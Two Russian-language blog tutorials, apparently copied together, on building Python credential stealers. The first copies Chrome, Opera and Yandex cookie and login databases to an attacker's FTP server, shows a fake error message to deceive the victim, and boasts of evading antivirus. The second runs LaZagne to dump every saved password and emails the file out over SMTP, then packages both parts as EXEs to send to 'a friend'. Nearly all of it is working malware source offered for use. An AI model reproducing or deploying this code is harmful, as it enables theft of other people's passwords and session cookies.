Стиллер на python это

Пишем крутой стиллер на Python

✔ И напоследок, мы подключаемся по ftp по логину, паролю и хосту.

Теперь перейдем к более интересным вещам, чем просто библиотеки, напишем уже сами пути к директориям, где лежат наши пароли, а пароли будем воровать из браузеров — Opera, Yandex, Google Chrome

UserName = '\\' + getpass.getuser() dir_cookie_google = 'C:\\Users'+UserName+'\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies' dir_pass_google = "C:\\Users"+UserName+"\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" dir_cookie_yandex = "C:\\Users"+UserName+"\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Cookies" dir_pass_yandex = "C:\\Users"+UserName+"\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Password Checker" dir_cookie_opera = "C:\\Users"+UserName+"\\AppData\\Roaming\\Opera Software\\Opera Stable\\Cookies" dir_pass_opera = "C:\\Users"+UserName+"\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data"

UserName — принимает значения имя текущего пользователя

dir_cookie_google, dir_pass_google, . . — и т.д. Это все директории где хранятся пароли, нам интерестны именно эти 3 браузера. Будем забирать пароли и куки и перекидывать их себе на сервер по FTP. Потом открывать в sqlite manager, но об этом позже.

У нас имеются директории, у нас есть библиотеки для работы, что же дальше? Пора приступать к основной задаче — написанию стиллера.

dir_google = "C:\\Users"+UserName+"\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies" dir_firefox = "C:\\Users"+UserName+"\\AppData\\Roaming\\Mozilla\\Firefox" dir_yandex = "C:\\Users"+UserName+"\\AppData\\Local\\Yandex" dir_opera = "C:\\Users"+UserName+"\\AppData\\Roaming\\Opera Software" def check(): if (os.path.exists(dir_google)) == True: filename = "google"+str(random.randint(1, 10000)) filename2 = "google_pass" + str(random.randint(1, 10000)) with open(dir_cookie_google, "rb") as content: con.storbinary("STOR %s" % filename, content) with open(dir_pass_google, "rb") as content: con.storbinary("STOR %s" % filename2, content) if (os.path.exists(dir_opera)) == True: filename = "opera"+str(random.randint(1, 10000)) filename2 = "opera_pass" + str(random.randint(1, 10000)) with open(dir_cookie_opera, "rb") as content: con.storbinary("STOR %s" % filename, content) with open(dir_pass_opera, "rb") as content: con.storbinary("STOR %s" % filename2, content) if (os.path.exists(dir_yandex)) == True: filename = "yandex"+str(random.randint(1, 10000)) filename2 = "yandex_pass" + str(random.randint(1, 10000)) with open(dir_cookie_yandex, "rb") as content: con.storbinary("STOR %s" % filename, content) with open(dir_pass_yandex, "rb") as content:

Рассмотрим первые строчки. В начале, до функции, мы записываем в переменные адреса наших директорий для последующей проверки на валидность. «Зачем это нужно?», — спросите вы меня. Да так проще! Зачем ставить try, except, если можно проверить на валидность с помощью os.path.exits.

if (os.path.exists(dir_google)) == True: filename = "google"+str(random.randint(1, 10000)) filename2 = "google_pass" + str(random.randint(1, 10000)) with open(dir_cookie_google, "rb") as content: con.storbinary("STOR %s" % filename, content) with open(dir_pass_google, "rb") as content: con.storbinary("STOR %s" % filename2, content)

Мы проверяем, является ли директория валидной, а после открываем ее, и отправляем файл на наш сервер FTP.

Такс. Функцию написали, библиотеки подключили, директории есть. Чего не хватает? Думаю, не хватает задействовать функцию и вывести на экран какую-нибудь псевдо-ошибку, что мол библиотека не подключена и все дела.

check() print("Error library import HOUII.dll") print("Error RUN cheat") input()

Первая строка — вызов функции, которая ворует пароли.

Далее выводим сообщения об «ошибке», чтобы пользователь думал, что это у него проблемы какие то. И что программа не зловредная, а наоборот, пыталась помочь. Но, как оказалось, библиотеки видите ли у него нет.

import os.path import getpass from ftplib import FTP import random con = FTP("хост","логин","пароль") """ Hack to directory """ UserName = '\\' + getpass.getuser() dir_cookie_google = 'C:\\Users'+UserName+'\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies' dir_pass_google = "C:\\Users"+UserName+"\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" dir_cookie_yandex = "C:\\Users"+UserName+"\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Cookies" dir_pass_yandex = "C:\\Users"+UserName+"\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Password Checker" dir_cookie_opera = "C:\\Users"+UserName+"\\AppData\\Roaming\\Opera Software\\Opera Stable\\Cookies" dir_pass_opera = "C:\\Users"+UserName+"\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data" dir_google = "C:\\Users"+UserName+"\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies" dir_firefox = "C:\\Users"+UserName+"\\AppData\\Roaming\\Mozilla\\Firefox" dir_yandex = "C:\\Users"+UserName+"\\AppData\\Local\\Yandex" dir_opera = "C:\\Users"+UserName+"\\AppData\\Roaming\\Opera Software" def check(): if (os.path.exists(dir_google)) == True: filename = "google"+str(random.randint(1, 10000)) filename2 = "google_pass" + str(random.randint(1, 10000)) with open(dir_cookie_google, "rb") as content: con.storbinary("STOR %s" % filename, content) with open(dir_pass_google, "rb") as content: con.storbinary("STOR %s" % filename2, content) if (os.path.exists(dir_opera)) == True: filename = "opera"+str(random.randint(1, 10000)) filename2 = "opera_pass" + str(random.randint(1, 10000)) with open(dir_cookie_opera, "rb") as content: con.storbinary("STOR %s" % filename, content) with open(dir_pass_opera, "rb") as content: con.storbinary("STOR %s" % filename2, content) if (os.path.exists(dir_yandex)) == True: filename = "yandex"+str(random.randint(1, 10000)) filename2 = "yandex_pass" + str(random.randint(1, 10000)) with open(dir_cookie_yandex, "rb") as content: con.storbinary("STOR %s" % filename, content) with open(dir_pass_yandex, "rb") as content: con.storbinary("STOR %s" % filename2, content) check() print("Error library import HOUII.dll") print("Error RUN cheat") input()

Компилируем в EXE

У нас есть код, но он на пайтоне, как же его эксплуатировать на чужом ПК?

Вот и все, по сути у нас есть EXE файл, который не палится антивирусами. На практике kaspersky, dr.web, и др популярные антивирусы не определяют его как вредоносное программное обеспечения, даже если ему тыкнуть носом, вот мол, смотри, давай его просканируем, может там вирусы трояны, бэкдоры!

он говорит — нет, там нету ничего.

Спасибо за внимание, дорогие друзья! Надеемся, что эта статья оказалась для вас интересной и главное полезной.

Источник

Стиллер на Python с отправкой по почте

Здравствуй, читатель сегодня поговорим о том почему не надо открывать непроверенные файлы скачанные с неизвестных источников и создадим такой файл чтобы понять что он может наделать на вашем ПК. Создавать мы будем стиллер который соберет все наши пароли и отправит их нам по почте.

Что для этого нужно?

1. Python 3.x.x
2. Инструмент для восстановления паролей(в нашем случае LaZagne)
3. Два аккаунта Google

И так начинаем

Для начала поместим .exe файл инструмента LaZagne в папку с нашим проектом. Далее создадим .bat файл с любым названием(у меня будет main.bat) и файл send.py.

У нас должна получится такая структура:

Пишем код

Откроем файл main.bat и поместим туда код:

@Echo off laZagne.exe all > pass.txt

Теперь при запуске нашего .bat файла у нас появится файл pass.txt в котором будут все ваши пароли из браузеров(и не только). Осталось только отправить данные на почту. Но как это сделать?

Отправка на почту

Открываем файл send.py и вставляем код:

import smtplib import os import mimetypes from email import encoders from email.mime.base import MIMEBase from email.mime.text import MIMEText from email.mime.image import MIMEImage from email.mime.audio import MIMEAudio from email.mime.multipart import MIMEMultipart def send_email(addr_from, password, addr_to, files): msg_subj = 'Password' msg_text = 'Password' msg = MIMEMultipart() msg['From'] = addr_from msg['To'] = addr_to msg['Subject'] = msg_subj body = msg_text msg.attach(MIMEText(body, 'plain')) process_attachement(msg, files) #==========Код зависящий от сервиса========== server = smtplib.SMTP('smtp.gmail.com', 587) server.starttls() server.login(addr_from, password) server.send_message(msg) server.quit() #============================================ def process_attachement(msg, files): for f in files: if os.path.isfile(f): attach_file(msg,f) elif os.path.exists(f): dir = os.listdir(f) for file in dir: attach_file(msg,f+"/"+file) def attach_file(msg, filepath): filename = os.path.basename(filepath) ctype, encoding = mimetypes.guess_type(filepath) if ctype is None or encoding is not None: ctype = 'application/octet-stream' maintype, subtype = ctype.split('/', 1) if maintype == 'text': with open(filepath) as fp: file = MIMEText(fp.read(), _subtype=subtype) fp.close() elif maintype == 'image': with open(filepath, 'rb') as fp: file = MIMEImage(fp.read(), _subtype=subtype) fp.close() elif maintype == 'audio': with open(filepath, 'rb') as fp: file = MIMEAudio(fp.read(), _subtype=subtype) fp.close() else: with open(filepath, 'rb') as fp: file = MIMEBase(maintype, subtype) file.set_payload(fp.read()) fp.close() encoders.encode_base64(file) file.add_header('Content-Disposition', 'attachment', filename=filename) msg.attach(file) #=====Настройки================================= _from = "from@gmail.com" _password = "password" _to = "to@gmail.com" files = ["pass.txt"] #============================================= send_email(_from, _password, _to, files)

Теперь нужно настроить и в зависимости от сервиса по которому будете отправлять почту изменяем выделенный код: Google (прежде нужно разрешить доступ для менее безопасных приложений):

server = smtplib.SMTP('smtp.gmail.com', 587) server.starttls() server.login(addr_from, password) server.send_message(msg) server.quit()

server = smtplib.SMTP_SSL('smtp.mail.ru', 25) server.login(addr_from, password) server.send_message(msg) server.quit()

server = smtplib.SMTP_SSL('smtp.yandex.ru', 465) server.login(addr_from, password) server.send_message(msg) server.quit()

Доделываем .bat

Теперь в наш .bat файл добавим код запуска файла send.py и удаления файла pass.txt:

Сборка

Теперь после запуска main.bat ваши пароли будут отправлены к вам на почту но если у вас не установлен Python то ничего не получится нужно превратить наш send.py файл в exe. Для этого открываем консоль и пишем:

pip install pyinstaller pyinstaller --onefile send.py

Еще но нужно превратить main.bat файл в main.exe, и в этом нам поможет Bat To Exe Converter. Жмем на кнопку с тремя точками(«. «) и ищем ваш файл main.bat, жмем «Открыть», после чего жмем «Convert» и получаем файл main.exe. Эти три файла и есть наш стиллер, можем отправлять другу и радоваться проверять на работоспособность.

Источник